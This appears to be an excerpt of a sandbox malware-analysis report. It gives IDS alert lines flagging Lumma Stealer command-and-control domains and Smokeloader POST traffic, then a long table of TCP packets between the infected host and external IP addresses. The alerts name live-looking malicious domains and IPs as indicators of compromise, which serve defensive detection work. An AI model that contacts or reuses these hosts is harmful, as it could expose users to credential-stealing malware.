2024-08-19T09:29:17.019200+0200	UDP	2054954	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (languagedscie .shop)	1	60199	53	192.168.2.4	1.1.1.1
2024-08-19T09:29:13.542692+0200	UDP	2054964	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (celebratioopz .shop)	1	64114	53	192.168.2.4	1.1.1.1
2024-08-19T09:31:11.757758+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	61798	80	192.168.2.4	58.151.148.90
2024-08-19T09:29:14.718473+0200	UDP	2054960	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deallerospfosu .shop)	1	50040	53	192.168.2.4	1.1.1.1
2024-08-19T09:28:13.440933+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49741	80	192.168.2.4	189.163.89.217
2024-08-19T09:29:14.290393+0200	TCP	2054963	ET MALWARE Observed Lumma Stealer Related Domain (writerospzm .shop in TLS SNI)	1	49765	443	192.168.2.4	172.67.166.231
2024-08-19T09:29:19.884457+0200	TCP	2054951	ET MALWARE Observed Lumma Stealer Related Domain (quialitsuzoxm .shop in TLS SNI)	1	49770	443	192.168.2.4	188.114.96.3
2024-08-19T09:28:28.890692+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49752	80	192.168.2.4	189.163.89.217
2024-08-19T09:30:44.707686+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	61794	80	192.168.2.4	58.151.148.90
2024-08-19T09:28:10.187755+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49738	80	192.168.2.4	189.163.89.217

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 19, 2024 09:27:47.585876942 CEST	49736	80	192.168.2.4	77.29.6.193
Aug 19, 2024 09:27:47.590708017 CEST	80	49736	77.29.6.193	192.168.2.4
Aug 19, 2024 09:27:47.590818882 CEST	49736	80	192.168.2.4	77.29.6.193
Aug 19, 2024 09:27:47.592767954 CEST	49736	80	192.168.2.4	77.29.6.193
Aug 19, 2024 09:27:47.592767954 CEST	49736	80	192.168.2.4	77.29.6.193
Aug 19, 2024 09:27:47.597672939 CEST	80	49736	77.29.6.193	192.168.2.4
Aug 19, 2024 09:27:47.597769022 CEST	80	49736	77.29.6.193	192.168.2.4
Aug 19, 2024 09:28:08.999092102 CEST	80	49736	77.29.6.193	192.168.2.4
Aug 19, 2024 09:28:08.999157906 CEST	49736	80	192.168.2.4	77.29.6.193
Aug 19, 2024 09:28:08.999263048 CEST	49736	80	192.168.2.4	77.29.6.193
Aug 19, 2024 09:28:09.004101038 CEST	80	49736	77.29.6.193	192.168.2.4
Aug 19, 2024 09:28:09.123289108 CEST	49738	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:09.128329039 CEST	80	49738	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:09.128421068 CEST	49738	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:09.128556013 CEST	49738	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:09.128586054 CEST	49738	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:09.137064934 CEST	80	49738	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:09.137291908 CEST	80	49738	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:10.187474012 CEST	80	49738	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:10.187663078 CEST	80	49738	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:10.187755108 CEST	49738	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:10.211966038 CEST	49738	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:10.215585947 CEST	49739	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:10.216878891 CEST	80	49738	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:10.220434904 CEST	80	49739	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:10.220712900 CEST	49739	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:10.220712900 CEST	49739	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:10.220712900 CEST	49739	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:10.225509882 CEST	80	49739	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:10.225524902 CEST	80	49739	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:11.288753986 CEST	80	49739	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:11.289340019 CEST	80	49739	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:11.289408922 CEST	49739	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:11.289534092 CEST	49739	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:11.292045116 CEST	49740	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:11.294287920 CEST	80	49739	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:11.296828985 CEST	80	49740	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:11.296905041 CEST	49740	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:11.297051907 CEST	49740	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:11.297087908 CEST	49740	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:11.301861048 CEST	80	49740	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:11.301918983 CEST	80	49740	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:12.363672972 CEST	80	49740	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:12.364170074 CEST	80	49740	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:12.364262104 CEST	49740	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:12.364320040 CEST	49740	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:12.366962910 CEST	49741	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:12.369215965 CEST	80	49740	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:12.371886015 CEST	80	49741	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:12.372107983 CEST	49741	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:12.372448921 CEST	49741	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:12.372477055 CEST	49741	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:12.377337933 CEST	80	49741	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:12.377580881 CEST	80	49741	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:13.440229893 CEST	80	49741	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:13.440795898 CEST	80	49741	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:13.440932989 CEST	49741	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:13.441220999 CEST	49741	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:13.443567038 CEST	49742	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:13.446067095 CEST	80	49741	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:13.448468924 CEST	80	49742	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:13.448637009 CEST	49742	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:13.448775053 CEST	49742	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:13.448775053 CEST	49742	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:13.453572989 CEST	80	49742	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:13.453689098 CEST	80	49742	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:14.515625000 CEST	80	49742	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:14.516208887 CEST	80	49742	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:14.516287088 CEST	49742	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:14.522300959 CEST	49742	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:14.525921106 CEST	49743	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:14.527153015 CEST	80	49742	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:14.530894041 CEST	80	49743	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:14.530956984 CEST	49743	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:14.531104088 CEST	49743	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:14.531126022 CEST	49743	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:14.535958052 CEST	80	49743	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:14.536039114 CEST	80	49743	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:15.588284016 CEST	80	49743	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:15.588529110 CEST	80	49743	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:15.588613987 CEST	49743	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:15.588655949 CEST	49743	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:15.591496944 CEST	49744	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:15.593462944 CEST	80	49743	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:15.596318960 CEST	80	49744	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:15.596384048 CEST	49744	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:15.596493006 CEST	49744	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:15.596508980 CEST	49744	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:15.601947069 CEST	80	49744	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:15.601962090 CEST	80	49744	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:16.666667938 CEST	80	49744	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:16.666831970 CEST	80	49744	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:16.666904926 CEST	49744	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:16.666954041 CEST	49744	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:16.669567108 CEST	49745	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:16.671770096 CEST	80	49744	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:16.674525023 CEST	80	49745	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:16.674705982 CEST	49745	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:16.674839020 CEST	49745	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:16.674865961 CEST	49745	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:16.679757118 CEST	80	49745	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:16.679785967 CEST	80	49745	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:17.764915943 CEST	80	49745	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:17.764939070 CEST	80	49745	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:17.765041113 CEST	49745	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:17.765233994 CEST	49745	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:17.768187046 CEST	49746	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:17.770095110 CEST	80	49745	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:17.773075104 CEST	80	49746	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:17.773139000 CEST	49746	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:17.773426056 CEST	49746	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:17.773454905 CEST	49746	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:17.780041933 CEST	80	49746	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:17.780056953 CEST	80	49746	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:18.847256899 CEST	80	49746	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:18.847587109 CEST	80	49746	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:18.847625971 CEST	49746	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:18.849163055 CEST	49746	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:18.853931904 CEST	80	49746	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:18.868016958 CEST	49747	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:18.872903109 CEST	80	49747	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:18.872972012 CEST	49747	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:18.876336098 CEST	49747	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:18.876364946 CEST	49747	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:18.881093025 CEST	80	49747	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:18.881211042 CEST	80	49747	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:19.948719978 CEST	80	49747	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:19.949126005 CEST	80	49747	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:19.949246883 CEST	49747	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:19.949296951 CEST	49747	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:19.952332973 CEST	49748	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:19.954102993 CEST	80	49747	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:19.957171917 CEST	80	49748	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:19.957254887 CEST	49748	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:19.957370996 CEST	49748	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:19.957400084 CEST	49748	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:19.962363958 CEST	80	49748	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:19.962469101 CEST	80	49748	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:21.024168015 CEST	80	49748	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:21.024275064 CEST	80	49748	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:21.024348021 CEST	49748	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:21.024487972 CEST	49748	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:21.027089119 CEST	49749	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:21.029318094 CEST	80	49748	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:21.031954050 CEST	80	49749	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:21.032054901 CEST	49749	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:21.032207966 CEST	49749	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:21.032233953 CEST	49749	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:21.037048101 CEST	80	49749	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:21.037125111 CEST	80	49749	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:22.108818054 CEST	80	49749	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:22.109150887 CEST	80	49749	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:22.109298944 CEST	49749	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:22.109360933 CEST	49749	80	192.168.2.4	189.163.89.217
Aug 19, 2024 09:28:22.114324093 CEST	80	49749	189.163.89.217	192.168.2.4
Aug 19, 2024 09:28:22.121313095 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:22.121367931 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:22.121437073 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:22.121815920 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:22.121841908 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:23.819868088 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:23.819962978 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:23.821501017 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:23.821512938 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:23.821908951 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:23.841406107 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:23.884496927 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.249437094 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.294182062 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.649367094 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649400949 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649419069 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649466038 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649486065 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649629116 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.649677038 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649715900 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649760008 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.649769068 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649800062 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649816990 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.649821997 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.649853945 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.649879932 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.655066013 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.655111074 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.655152082 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.655162096 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.655199051 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.655208111 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.656950951 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.656999111 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.657036066 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.657044888 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.657068968 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.657089949 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.661039114 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.661082983 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.661130905 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.661143064 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.661166906 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.661179066 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.662862062 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.662909031 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.662940979 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.662949085 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.662980080 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.662990093 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.695775986 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.695821047 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.695871115 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.695897102 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.695914984 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.695946932 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.696533918 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.696579933 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.696605921 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.696616888 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.696630955 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.696655989 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.697642088 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.697689056 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.697731972 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.697740078 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.697774887 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.697793961 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.698365927 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.698409081 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.698440075 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.698446989 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.698466063 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.698484898 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.700573921 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.700632095 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.700644016 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.700656891 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.700687885 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.700706959 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.701386929 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.701432943 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.701456070 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.701467037 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.701482058 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.701498032 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.786333084 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.786376953 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.786473036 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.786505938 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:24.786520004 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:24.786552906 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.034219980 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.034286022 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.034332037 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.034379005 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.034398079 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.034415960 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.034917116 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.034965038 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.034987926 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.035001040 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.035017014 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.035032034 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.035248041 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.035304070 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.035327911 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.035339117 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.035358906 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.035373926 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.035897017 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.035939932 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.035969973 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.035978079 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.035991907 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.036015987 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.036313057 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.036367893 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.036384106 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.036396027 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.036422968 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.036434889 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.036957026 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.037008047 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.037034035 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.037043095 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.037058115 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.037070990 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.037175894 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.037236929 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.037237883 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.037273884 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.037287951 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.037314892 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.038028002 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.038070917 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.038094997 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.038106918 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.038136005 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.038151979 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.038826942 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.038894892 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.038923979 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.038933039 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.038964987 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.038964987 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.039073944 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.039117098 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.039139032 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.039149046 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.039164066 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.039180994 CEST	49750	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:25.039966106 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.040009975 CEST	443	49750	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:25.040033102 CEST	49750	443	192.168.2.4	185.149.100.242
